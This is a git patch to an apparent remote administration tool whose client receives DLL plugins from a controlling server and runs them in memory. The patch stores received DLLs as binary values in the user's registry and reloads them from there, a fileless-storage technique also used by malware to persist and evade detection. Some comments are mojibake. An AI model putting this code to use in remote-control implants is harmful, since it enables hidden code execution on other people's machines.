From 45e7950bb79d89345dbb25f33622636158a76037 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Sat, 12 Jul 2025 14:24:35 +0800
Subject: [PATCH] Improve: Save DLL data to registry

---
 client/KernelManager.cpp            | 26 +++++++--
 common/iniFile.h                    | 84 +++++++++++++++++++++++++++++
 server/2015Remote/2015RemoteDlg.cpp | 15 +++---
 3 files changed, 114 insertions(+), 11 deletions(-)

diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp
index 20b41b6..69fbf1f 100644
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -265,13 +265,31 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 		const char* md5 = info->Md5;
 		auto find = m_MemDLL.find(md5);
 		if (find == m_MemDLL.end() && ulLength == sz) {
-			// 第一个命令没有包含DLL数据，需客户端检测本地是否已经有相关DLL，没有则向主控请求执行代码
-			m_ClientObject->Send2Server((char*)szBuffer, ulLength);
-			break;
+			iniFile cfg(CLIENT_PATH);
+			auto md5 = cfg.GetStr("settings", info->Name + std::string(".md5"));
+			if (md5.empty() || md5 != info->Md5) {
+				// 第一个命令没有包含DLL数据，需客户端检测本地是否已经有相关DLL，没有则向主控请求执行代码
+				m_ClientObject->Send2Server((char*)szBuffer, ulLength);
+				break;
+			}
+			Mprintf("Execute local DLL from registry: %s\n", md5.c_str());
+			binFile bin(CLIENT_PATH);
+			auto local = bin.GetStr("settings", info->Name + std::string(".bin"));
+			const BYTE* bytes = reinterpret_cast<const BYTE*>(local.data());
+			m_MemDLL[md5] = std::vector<BYTE>(bytes + sz, bytes + sz + info->Size);
+			find = m_MemDLL.find(md5);
 		}
 		BYTE* data = find != m_MemDLL.end() ? find->second.data() : NULL;
 		if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) {
-			if (md5[0]) m_MemDLL[md5] = std::vector<BYTE>(szBuffer + sz, szBuffer + sz + info->Size);
+			if (md5[0]) {
+				m_MemDLL[md5] = std::vector<BYTE>(szBuffer + sz, szBuffer + sz + info->Size);
+				iniFile cfg(CLIENT_PATH);
+				cfg.SetStr("settings", info->Name + std::string(".md5"), md5);
+				binFile bin(CLIENT_PATH);
+				std::string buffer(reinterpret_cast<const char*>(szBuffer), ulLength);
+				bin.SetStr("settings", info->Name + std::string(".bin"), buffer);
+				Mprintf("Save DLL to registry: %s\n", md5);
+			}
 			data = szBuffer + sz;
 		}
 		if (data) {
diff --git a/common/iniFile.h b/common/iniFile.h
index a7983cc..e6df511 100644
--- a/common/iniFile.h
+++ b/common/iniFile.h
@@ -124,3 +124,87 @@ public:
 		}
 	}
 };
+
+class binFile : public config
+{
+private:
+	HKEY m_hRootKey;
+	std::string m_SubKeyPath;
+
+public:
+	~binFile() {}
+
+	binFile(const std::string& path = CLIENT_PATH)
+	{
+		m_hRootKey = HKEY_CURRENT_USER;
+		m_SubKeyPath = path;
+	}
+
+	// 写入整数（写为二进制）
+	bool SetInt(const std::string& MainKey, const std::string& SubKey, int Data) override
+	{
+		return SetBinary(MainKey, SubKey, reinterpret_cast<const BYTE*>(&Data), sizeof(int));
+	}
+
+	// 写入字符串（以二进制方式）
+	bool SetStr(const std::string& MainKey, const std::string& SubKey, const std::string& Data) override
+	{
+		return SetBinary(MainKey, SubKey, reinterpret_cast<const BYTE*>(Data.data()), static_cast<DWORD>(Data.size()));
+	}
+
+	// 读取字符串（从二进制数据转换）
+	std::string GetStr(const std::string& MainKey, const std::string& SubKey, const std::string& def = "") override
+	{
+		std::vector<BYTE> buffer;
+		if (!GetBinary(MainKey, SubKey, buffer))
+			return def;
+
+		return std::string(buffer.begin(), buffer.end());
+	}
+
+	// 读取整数（从二进制解析）
+	int GetInt(const std::string& MainKey, const std::string& SubKey, int defVal = 0) override
+	{
+		std::vector<BYTE> buffer;
+		if (!GetBinary(MainKey, SubKey, buffer) || buffer.size() < sizeof(int))
+			return defVal;
+
+		int value = 0;
+		memcpy(&value, buffer.data(), sizeof(int));
+		return value;
+	}
+
+private:
+	bool SetBinary(const std::string& MainKey, const std::string& SubKey, const BYTE* data, DWORD size)
+	{
+		std::string fullPath = m_SubKeyPath + "\\" + MainKey;
+		HKEY hKey;
+		if (RegCreateKeyExA(m_hRootKey, fullPath.c_str(), 0, NULL, 0, KEY_WRITE, NULL, &hKey, NULL) != ERROR_SUCCESS)
+			return false;
+
+		bool bRet = (RegSetValueExA(hKey, SubKey.c_str(), 0, REG_BINARY, data, size) == ERROR_SUCCESS);
+		RegCloseKey(hKey);
+		return bRet;
+	}
+
+	bool GetBinary(const std::string& MainKey, const std::string& SubKey, std::vector<BYTE>& outData)
+	{
+		std::string fullPath = m_SubKeyPath + "\\" + MainKey;
+		HKEY hKey;
+		if (RegOpenKeyExA(m_hRootKey, fullPath.c_str(), 0, KEY_READ, &hKey) != ERROR_SUCCESS)
+			return false;
+
+		DWORD dwType = 0;
+		DWORD dwSize = 0;
+		if (RegQueryValueExA(hKey, SubKey.c_str(), NULL, &dwType, NULL, &dwSize) != ERROR_SUCCESS || dwType != REG_BINARY)
+		{
+			RegCloseKey(hKey);
+			return false;
+		}
+
+		outData.resize(dwSize);
+		bool bRet = (RegQueryValueExA(hKey, SubKey.c_str(), NULL, NULL, outData.data(), &dwSize) == ERROR_SUCCESS);
+		RegCloseKey(hKey);
+		return bRet;
+	}
+};
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index 96c7191..565cf78 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -221,28 +221,29 @@ DllInfo* ReadPluginDll(const std::string& filename) {
 
 	// 鍒嗛厤缂撳啿鍖�: CMD + DllExecuteInfo + size
 	BYTE* buffer = new BYTE[1 + sizeof(DllExecuteInfo) + fileSize];
-	if (!file.read(reinterpret_cast<char*>(buffer + 1 + sizeof(DllExecuteInfo)), fileSize)) {
+	BYTE* dllData = buffer + 1 + sizeof(DllExecuteInfo);
+	if (!file.read(reinterpret_cast<char*>(dllData), fileSize)) {
 		Mprintf("璇诲彇鏂囦欢澶辫触: %s\n", filename.c_str());
 		delete[] buffer;
 		return nullptr;
 	}
-	if (!IsDll64Bit(buffer + 1 + sizeof(DllExecuteInfo))) {
+	if (!IsDll64Bit(dllData)) {
 		Mprintf("涓嶆敮鎸�32浣岲LL: %s\n", filename.c_str());
 		delete[] buffer;
 		return nullptr;
 	}
 	std::string masterHash(skCrypt(MASTER_HASH));
-	int offset = MemoryFind((char*)buffer + 1 + sizeof(DllExecuteInfo), masterHash.c_str(), fileSize, masterHash.length());
+	int offset = MemoryFind((char*)dllData, masterHash.c_str(), fileSize, masterHash.length());
 	if (offset != -1) {
 		std::string masterId = GetPwdHash(), hmac = GetHMAC();
 		if(hmac.empty())
 			hmac = THIS_CFG.GetStr("settings", "HMAC");
-		memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo)+offset, masterId.c_str(), masterId.length());
-		memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo) + offset + masterId.length(), hmac.c_str(), hmac.length());
+		memcpy((char*)dllData + offset, masterId.c_str(), masterId.length());
+		memcpy((char*)dllData + offset + masterId.length(), hmac.c_str(), hmac.length());
 	}
 
 	// 璁剧疆杈撳嚭鍙傛暟
-	auto md5 = CalcMD5FromBytes(buffer + 1 + sizeof(DllExecuteInfo), fileSize);
+	auto md5 = CalcMD5FromBytes(dllData, fileSize);
 	DllExecuteInfo info = { MEMORYDLL, fileSize, CALLTYPE_IOCPTHREAD, };
 	memcpy(info.Name, name.c_str(), name.length());
 	memcpy(info.Md5, md5.c_str(), md5.length());
@@ -2659,7 +2660,7 @@ void CMy2015RemoteDlg::OnDynamicSubMenu(UINT nID) {
 		Buffer* buf = m_DllList[menuIndex]->Data;
 		int	iItem = m_CList_Online.GetNextSelectedItem(Pos);
 		context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
-		ContextObject->Send2Client( buf->Buf(), 1 + sizeof(DllExecuteInfo));
+		ContextObject->Send2Client( buf->Buf(), 1 + sizeof(DllExecuteInfo) );
 	}
 	LeaveCriticalSection(&m_cs);
 }